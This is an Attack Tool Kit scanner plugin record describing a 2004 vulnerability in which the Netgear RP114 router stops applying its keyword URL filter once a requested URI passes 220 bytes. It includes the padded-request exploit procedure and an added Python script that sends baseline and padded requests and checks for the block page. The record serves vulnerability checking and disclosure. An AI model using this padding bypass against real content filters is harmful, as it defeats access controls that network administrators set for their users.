Netgear RP114 URL filtering long request evasion 2.0
 
Plugin ID: 135
Plugin name: Netgear RP114 URL filtering long request evasion
Plugin filename: Netgear RP114 URL filtering long request evasion.plugin
Plugin filesize: 4695 bytes
Plugin family: Firewalls
Plugin created name: Marc Ruef
Plugin created email: marc dot ruef at computec dot ch
Plugin created web: http://www.computec.ch
Plugin created company: computec.ch
Plugin created date: 2004/09/02
Plugin updated name: Marc Ruef
Plugin updated email: marc dot ruef at computec dot ch
Plugin updated web: http://www.computec.ch
Plugin updated company: computec.ch
Plugin updated date: 2004/11/14
Plugin version: 2.0
Plugin changelog: Added SecurityTracker ID in version 1.1. Corrected the plugin structure and added the accuracy values in 1.2. Improved the pattern matching and introduced the plugin changelog in 2.0.
Plugin protocol: tcp
Plugin port: 80
Plugin procedure exploit: open|send GET http://www.computec.ch/?%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.1 200 OK*Server: NETGEAR: Content Filter/1.#*Access Denied by NETGEAR*
Plugin exploit accuracy: 97
Plugin comment: This plugin was written with the ATK Attack Editor.
Bug published name: Marc Ruef
Bug published email: marc dot ruef at computec dot ch
Bug published web: http://www.computec.ch
Bug published company: computec.ch
Bug published date: 2004/05/24
Bug advisory: http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=667
Bug affected: Netgear RP114
Bug not affected: Other solutions
Bug vulnerability class: Evasion
Bug description: Netgear sells small router and firewall devices for home users and small companies (SOHO). Most of them can do simple keyword-based URL filtering. Suppose we do not want users to visit http://www.computec.ch, so we create a filter for the keyword "computec.ch". A user who requests any host name containing the string "computec.ch" (e.g. www.computec.ch or test.computec.ch) receives a blank HTML page saying "Blocked by NETGEAR" instead of the requested document. The Netgear RP114 does not apply the filter when the requested URI is longer than 220 bytes. Other Netgear routers and firewalls may also be affected. By padding the URI past that length (the exploit procedure above pads the query string with URL-encoded spaces), a user can retrieve the filtered document without restriction, so the URL blacklist can be evaded to reach disallowed resources. The cause may be a buffer overflow, in which case it may also be possible to run arbitrary code on the Netgear device.
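The check the plugin performs, as an added example (not ATK code and not from the advisory): build the baseline and the padded request, classify the response against the plugin's block-page pattern, and only report the filter as evadable when the short URI was actually blocked first. The block-page text, the `Content Filter/1.0` header, the reading of `#` as a single digit in the ATK pattern, and the toy `simulated_rp114` model (which just implements the 220-byte rule the advisory describes, not real firmware) are all assumptions made for this example.

```python
import re
import socket

# ATK check pattern from the plugin record: '*' is a wildcard; '#' is read here as
# a single digit (an assumption about ATK pattern syntax, not stated on this page).
BLOCK_PATTERN = "HTTP/1.1 200 OK*Server: NETGEAR: Content Filter/1.#*Access Denied by NETGEAR*"

# Constructed sample responses for offline use (not captured from a real device).
SAMPLE_BLOCK_PAGE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: NETGEAR: Content Filter/1.0\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<html><body>Access Denied by NETGEAR</body></html>"
)
SAMPLE_PASSTHROUGH = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<html><body>Welcome to computec.ch</body></html>"
)


def atk_pattern_matches(pattern: str, text: str) -> bool:
    """Translate an ATK-style pattern into a regex and search the response for it."""
    regex = "".join(
        ".*" if ch == "*" else r"\d" if ch == "#" else re.escape(ch) for ch in pattern
    )
    return re.search(regex, text, re.DOTALL) is not None


def is_blocked(response: str) -> bool:
    """True when the response is the NETGEAR content-filter block page."""
    return atk_pattern_matches(BLOCK_PATTERN, response)


def build_request(host: str, path: str = "/", min_uri_len: int = 0, pad: str = "%20"):
    """Proxy-style HTTP/1.0 GET with an absolute URI. If min_uri_len is set, the query
    string is padded with URL-encoded spaces until the raw URI is at least that long."""
    uri = f"http://{host}{path}"
    if min_uri_len > len(uri):
        uri += "?"
        while len(uri) < min_uri_len:
            uri += pad
    return uri, f"GET {uri} HTTP/1.0\r\n\r\n"


def check_evasion(send, host: str, path: str = "/", threshold: int = 220) -> str:
    """Two-step check: the short URI must be blocked first, otherwise the padded result
    proves nothing; then the padded URI (threshold + 1 bytes) is sent and classified."""
    _, short_req = build_request(host, path)
    if not is_blocked(send(short_req)):
        return "filter-inactive"
    _, long_req = build_request(host, path, min_uri_len=threshold + 1)
    return "evadable" if not is_blocked(send(long_req)) else "filter-holds"


def simulated_rp114(request: str, keyword: str = "computec.ch", max_filtered_len: int = 220) -> str:
    """Toy model of the behaviour the advisory describes (not device firmware): the
    keyword filter only fires while the URI is at most max_filtered_len bytes long."""
    uri = request.split(" ", 2)[1]
    if len(uri) <= max_filtered_len and keyword in uri:
        return SAMPLE_BLOCK_PAGE
    return SAMPLE_PASSTHROUGH


def tcp_send(host: str, port: int = 80, timeout: float = 5.0):
    """Return a send() callable that delivers one request over TCP and reads the reply."""
    def send(request: str) -> str:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request.encode("ascii"))
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks).decode("latin-1")
    return send


if __name__ == "__main__":
    # Offline: the toy model reproduces the advisory's result.
    print("simulated RP114:", check_evasion(simulated_rp114, "www.computec.ch"))
    # Live, from a client behind the device (only the device can serve the block page):
    # print(check_evasion(tcp_send("www.computec.ch"), "www.computec.ch"))
```

The length is counted on the raw, still URL-encoded URI, which is how the plugin's padding works; whether the device measures the decoded form instead is not stated in the advisory, so a live run that returns "filter-holds" at 221 bytes is worth repeating with a larger `threshold` before concluding the device is fixed.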
Bug solution: Netgear may provide a new firmware or another workaround. It is suggested to install another URL filtering solution if this functionality is really needed.
Bug fixing time: Approx. 45 minutes
Bug exploit availability: Yes
Bug exploit url: http://www.computec.ch/projekte/atk/
Bug remote: No
Bug local: No
Bug severity: Medium
Bug popularity: 6
Bug simplicity: 8
Bug impact: 7
Bug risk: 6
Bug check tools: The ATK is able to exploit this vulnerability. Under some circumstances the WinAmp player triggers this behaviour unintentionally when fetching information about the playing track from the Internet; see http://seclists.org/lists/bugtraq/2004/May/0263.html for details.
Source SecurityFocus BID: 10404
Source Secunia ID: 11698
Source SecuriTeam URL: http://www.securiteam.com/securitynews/5VP0P15CUK.html
Source Security Tracker ID: 1010263
Source scip ID: 667
Source Literature: Hacking Intern - Angriffe, Strategien, Abwehr, Marc Ruef, Marko Rogge, Uwe Velten and Wolfram Gieseke, November 1, 2002, Data Becker, Düsseldorf, ISBN 381582284X
Source Misc.: http://www.securiteam.com/securitynews/5HP01208AQ.html

This file was generated by the Attack Tool Kit (ATK), the open-source security scanner and exploiting framework.